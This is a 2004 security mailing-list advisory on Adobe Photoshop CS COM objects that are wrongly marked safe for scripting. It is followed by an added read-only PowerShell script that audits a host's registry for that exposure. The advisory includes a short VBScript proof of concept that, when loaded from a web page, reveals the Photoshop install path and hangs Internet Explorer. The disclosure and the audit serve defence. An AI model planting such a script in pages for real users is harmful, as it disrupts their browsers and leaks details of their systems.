Full Disclosure mailing list archives
Adobe Photoshop 8.0 (CS) - Local Path Disclosure and causing I.E D.O.S
From: "Rafel Ivgi, The-Insider" <theinsider () 012 net il>
Date: Tue, 6 Apr 2004 18:46:58 +0200
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application:    Adobe Photoshop
Vendors:        http://www.adobe.com
Version:        8.0 (CS)
Platforms:      Windows
Bug:            Local Path Disclosure and D.O.S
Risk:           Medium - Denial Of Service
Exploitation:   Remote with browser
Date:           1 Apr 2004
Author:         Rafel Ivgi, The-Insider
e-mail:         the_insider () mail com
web:            http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1) Introduction
2) Bugs
3) The Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

Adobe Photoshop is one of the world's best graphic editors. It has a great
set of tools, layer combinations, brushes, amazing software.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

Adobe Photoshop registers a lot of COM objects (such as
"Photoshop.Application.8" and "Photoshop.PhotoCDOpenOptions.8"). These
objects are marked as "safe" for scripting. Therefore they can be created
remotely (which is the root of the problem - they should not!).

Unfortunately, Adobe did not design their objects correctly, because upon
any remote creation of a Photoshop object a message pops up saying Adobe
Photoshop security caught "potential tampering with photoshop"; however,
it also reveals the local path in which Photoshop was installed, and the
Internet Explorer window stops responding (D.O.S).

For Example:

<script language=vbscript>
Dim cooler
Set cooler = CreateObject("Photoshop.Application.8")
</script>

will show where Photoshop is installed, and the Internet Explorer window
stops responding (D.O.S).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

This is Proof Of Concept Code:

------------------- CUT HERE -------------------
<script language=vbscript>
Dim cooler
Set cooler = CreateObject("Photoshop.Application.8")
</script>
------------------- CUT HERE -------------------

Or

------------------- CUT HERE -------------------
<script language=vbscript>
Dim cooler
Set cooler = CreateObject("Photoshop.PhotoCDOpenOptions.8")
</script>
------------------- CUT HERE -------------------

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Only the one who sees the invisible, Can do the Impossible."
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
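
Added example, not part of the original post: a read-only PowerShell audit that checks whether the two ProgIDs named in the advisory are registered with the "safe for scripting" category on a host, and whether an Internet Explorer kill bit is already set for them. The function name and output columns are assumptions made for this example; the category GUIDs and the "Compatibility Flags" kill-bit value are the standard Windows ones.

```powershell
# Added audit sketch, not code from the advisory. Read-only: changes nothing.
$progIds = 'Photoshop.Application.8', 'Photoshop.PhotoCDOpenOptions.8'  # from the post

$catSafeScript = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'  # CATID_SafeForScripting
$catSafeInit   = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}'  # CATID_SafeForInitializing
$killBit       = 0x400  # "Compatibility Flags" bit that stops IE loading the control

# Native and 32-bit (WOW6432Node) registry views; a 32-bit control on 64-bit
# Windows is registered under the second one.
$views = @(
    @{ Clsid  = 'Registry::HKEY_CLASSES_ROOT\CLSID'
       Compat = 'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility' },
    @{ Clsid  = 'Registry::HKEY_CLASSES_ROOT\WOW6432Node\CLSID'
       Compat = 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility' }
)

# Hypothetical helper name. Registry categories only: a control that asserts
# safety at run time through IObjectSafety will not show up here.
function Get-ComScriptingExposure {
    param([Parameter(Mandatory)][string[]]$ProgId)
    foreach ($id in $ProgId) {
        $idKey = "Registry::HKEY_CLASSES_ROOT\$id\CLSID"
        if (-not (Test-Path -LiteralPath $idKey)) {
            # ProgID not registered on this host
            [pscustomobject]@{ ProgId = $id; Clsid = $null; View = $null
                SafeForScripting = $false; SafeForInit = $false; KillBitSet = $false }
            continue
        }
        $clsid = (Get-Item -LiteralPath $idKey).GetValue('')   # default value = CLSID
        foreach ($v in $views) {
            $classKey = "$($v.Clsid)\$clsid"
            if (-not (Test-Path -LiteralPath $classKey)) { continue }
            $cats  = "$classKey\Implemented Categories"
            $flags = (Get-ItemProperty -LiteralPath "$($v.Compat)\$clsid" `
                -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
            [pscustomobject]@{
                ProgId           = $id
                Clsid            = $clsid
                View             = $v.Clsid
                SafeForScripting = Test-Path -LiteralPath "$cats\$catSafeScript"
                SafeForInit      = Test-Path -LiteralPath "$cats\$catSafeInit"
                KillBitSet       = [bool]($flags -band $killBit)
            }
        }
    }
}

Get-ComScriptingExposure -ProgId $progIds | Format-Table -AutoSize
```

A row with SafeForScripting = True and KillBitSet = False is a host where a web page in Internet Explorer can instantiate the object as the advisory describes.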